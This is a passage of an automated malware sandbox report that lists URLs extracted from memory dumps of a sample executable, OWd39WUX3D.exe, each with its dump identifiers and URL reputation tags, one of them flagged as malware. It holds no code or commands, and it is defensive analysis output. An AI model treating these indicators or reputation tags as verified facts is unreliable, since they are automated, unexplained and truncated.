00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://chart.apis.google.com/chart?chs=100x100&cht=qr&chld=LOWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://gmpg.org/xfn/11OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.cloudflare.com/5xx-error-landingOWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.592879223.0000000000C40000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.485425382.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.381685715.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://www.myropcb.com/services-capabilities/stencil/OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://www.valselit.com/177-appartement-a-vendre-sigean-30378OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                    unknown
                                                                                                                                                                    https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.woff2OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://www.myropcb.com/why-use-myro/OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/pretvorniki-nivoja/OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.pcgrate.com/wp-content/themes/dt-the7/js/main.min.js?ver=9.12.0OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://gholographic.com/OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.0OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/podaljski-za-termoclene-termoelemenOWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://www.ora-ito.com/OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.590153485.0000000006B65000.00000004.00000020.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.497001051.0000000007330000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://tickets.suresupport.com/faq/article-1596/enOWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 